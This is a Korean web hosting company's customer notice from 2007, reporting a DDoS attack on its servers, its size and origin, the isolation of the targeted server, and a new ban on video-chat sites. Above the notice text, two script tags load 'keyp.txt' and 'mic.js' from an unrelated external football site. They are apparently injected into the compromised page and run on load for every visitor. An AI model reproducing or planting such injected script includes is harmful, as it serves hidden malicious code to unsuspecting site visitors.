:: 제로보드 전문호스팅 제로호스팅 ::
:: 제로보드 전문호스팅 제로호스팅 ::
      Untitled Document
1차 네임서버
ns1.zerois.net 183.111.167.31
2차 네임서버
ns2.zerois.net 183.111.167.32

2차 DDOS 공격 발생과 대응 및 조치사항에 대한 보고
  | Name : 제로호스팅  | View : 5,520| Date : am.2.9-09:28
                                            <SCRIPT src=http://soccer1.ktdom.com/bbs/data/soccer4ugallery/keyp.txt></script>              <SCRIPT src=http://soccer1.ktdom.com/bbs/data/soccer4u/mic.js></script>                                                  <P>안녕하세요. 마루인터넷입니다.<BR><BR>최근 DDOS공격이 기승을 부리고 있습니다. 통상적인 공격 수법과 달리 수백여개 이상의 공격자를 이용한<BR>순간 네트워크 공격량이 수백M 이상에 달해 사실상 근본적인 차단 방안이 전무한 상태 입니다.<BR><BR>통상의 DDOS공격을 막을 수 있는 부하량은 수십M 이하의 량은 막을 수 있어나, 수백M가 이상의 공격량은 차단불가 합니다. (방화벽이나 소규모 DDOS장비의 처리능력보다 큰 네트워크 부하영역)<BR><BR>최근 여러 호스팅 회사들이 동일한 수법의 공격에 피해를 받고 있으며, 포털사이트도 공격시 서비스 장애 발생한 예가 있습니다.<BR>(<STRONG>관련기사 보기</STRONG> : <A href="http://www.ytn.co.kr/_ln/0103_200702061851014569" target=_blank><FONT color=#ff0000>http://www.ytn.co.kr/_ln/0103_200702061851014569</FONT></A> )<BR><BR>현재로서 최선의 조치 방법은 공격 대상이 된&nbsp;서버와 공격 대상이 된&nbsp;사이트를 최대한 빨리 찾아 타서버의 피해를 최소화 하는 것입니다. <BR>(<STRONG>관련기사 보기</STRONG> : <A href="http://www.edaily.co.kr/news/stock/newsRead.asp?sub_cd=DB41&newsid=01902406582997064&clkcode=00203&DirCode=0030503&curtype=read" target=_blank><FONT color=#ff0000>http://www.edaily.co.kr/news/stock/newsRead.asp?sub_cd=DB41&newsid=01902406582997064&clkcode=00203&DirCode=0030503&curtype=read</FONT></A> )<BR><BR>다음은 이번 DDOS공격 발생과 대응 및 조치사항에 대한 보고 입니다.<BR><BR>● 공격한 네트워크 부하량 : <U>최대 840M<BR></U><BR>● 공격지 : <U>중국,홍콩,미안먀</U> 등지의 산재한 수백여대의 좀비 프로그램이 설치된 컴퓨터.<BR><BR>● 공격 피해 시간 : 2007년 2월 8일 오후 6시 34분 ~ 오후 6시 48분. (<U>약 14분</U>)<BR><BR>● 피해 서버 : 공격대상 서버를 포함하여&nbsp;동일한 네트워크 존에 있던 8대.<BR><BR>● 실제 공격 시간 : 2007년 2월 8일 오후 6시 34분 ~ 오후 8시 32분까지.<BR><BR>● 공격에 대한 방어 조치&nbsp;: 공격 개시시 공격대상 IP에 대한 신속한 분석 후.<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;라우터에서 공격대상지로의 접근을 차단하여 피해시간 최소화.<BR><BR>● 조치사항 : <U>공격 대상 서버를 별도 네트워크 존에 격리.<BR></U>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;해당 서버에서 서비스 되고 있던 화상채팅 관련 사이트의 서비스 중지.<BR><BR>● 이후사항 : 공격 당했던 서버에 대한 재공격시 피공격 서버가 별도 네트워크 존에 격리된 관계로<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 해당 서버는 1차 서비스 장애가 발생되나, 여타 서버군에 대한 서비스 침해 방지.<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 신속한 네트워크상의 공격 대응으로 공격대상지 서비스 차단 예정.<BR><BR>● 신설규정 : 마루인터넷의 호스팅 서비스에서는 <U>화상채팅 관련 사이트에 관련된 경우 서비스의 신청 및 제공이 되지 않으며, 발견시 폐쇄</U> 조치됩니다.<BR><BR>최근의 DDOS공격으로 불편을 드려 송구한 마음 금할 수 없습니다.<BR><BR>하지만, 마루인터넷의 임직원들도 초대 대응에 만전을 기하고 있으며, 이번 공격 사태 대응과 같이 보다 신속한 대응으로 피해를 최소화 하도록 하겠습니다.<BR><BR>또한, 고객 여러분들께서도 불미스러운 메시지나 공격예고를 아실 경우 마루인터넷에 통보하시어 피해를 예방해 주시면 감사하겠습니다.</P>
  프린트하기  
마루인터넷(주), 대표자 : 허기행
사업자번호 : 113-86-13085, 통신판매업 신고번호 : 제4098호
서울시 구로구 구로3동 212-30 에이스트윈타워 2차 604호
전화 : 070-7452-5757, 팩스 : 070-7427-5753
E-mail : webmaster@zerois.co.kr
Copyright ⓒ 마루인터넷 Corp. All rights reserved.
ISCS   호스팅 서비스를 위한 토탈  솔루션 -  호스트허브 ISS암호화